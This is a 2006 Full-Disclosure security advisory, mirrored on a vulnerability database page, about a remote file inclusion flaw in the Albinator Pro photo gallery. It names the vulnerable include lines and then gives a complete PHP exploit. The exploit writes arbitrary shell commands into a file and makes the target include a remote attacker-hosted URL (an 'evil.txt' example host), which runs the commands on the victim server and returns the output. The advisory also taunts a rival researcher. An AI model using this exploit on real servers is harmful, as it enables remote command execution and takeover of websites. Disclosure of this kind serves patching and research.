Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12537
HistoryMay 04, 2006 - 12:00 a.m.

[Full-disclosure] [XPA] - Albinator Pro <= 2.0.8 - Remote Command Execution Vulnerability

2006-05-0400:00:00
vulners.com
21
JSON

===========================================================================
XOR Crew :: Security Advisory 0day GIVE AWAY (date?) 2/20/2006

Albinator Pro <= 2.0.8 - Remote Command Execution Vulnerability

http://www.xorcrew.net/ http://www.xorcrew.net/ReZEN

:: Summary

   Vendor       :  Albinator
   Vendor Site  :  http://www.dreamcost.com/
   Product&#40;s&#41;   :  Albinator Pro - Photo Album/Gallery Management System
   Version&#40;s&#41;   :  All
   Severity     :  Medium/High
   Impact       :  Remote Command Execution
   Release Date :  2/11/2006
   Credits      :  ReZEN &#40;rezen &#40;a&#41; xorcrew &#40;.&#41; net&#41;

===========================================================================

I. Description

Albinator is developed in PHP, backed by lightning speed database in
MySql. With its unique features, it instantly and automatically
organizes your websites' users digital images into compact digital photo
albums ideal for sharing and emailing to friends and family. It
automatically generates thumbnails to the photos for easy browsing.

===========================================================================

II. Synopsis (0day give away because r0t is stupid)

THIS BUG WORKS FOR ALL VERSIONS OF ALBINATOR!!!

(r0t you are a moron, stick to useless XSS exploits please thanks)

There is a remote file inclusion vulnerability that allows for remote
command execution in the /essentials/gc.php and in the
essentials/integration.inc.php file. The bug is here on lines 2, and 3:

include_once($dirpath . "essential/config.php");
include_once($dirpath . "essential/config_tables.inc.php");

the $dirpath variable is not set prior to being used in the
include_once() function. The vendor and support team have been contacted.

===========================================================================

Exploit code:

-----BEGIN-----

<?php
/*
Albinator Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K
url: http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/path to albinator/essential/gc.php?dirpath=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"
value=\"".$turl."\"><br>"
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"
value=\"".$hurl."\"><br>"
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"
value=\"".$cmd."\"><br>"
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
echo "<p>Unable to get output.\n";
exit;
}

echo $form;

while (!feof ($file)) {
$line .= fgets ($file, 1024)."<br>";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>

------END------

===========================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, cijfer, D2K.

===========================================================================

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

JSON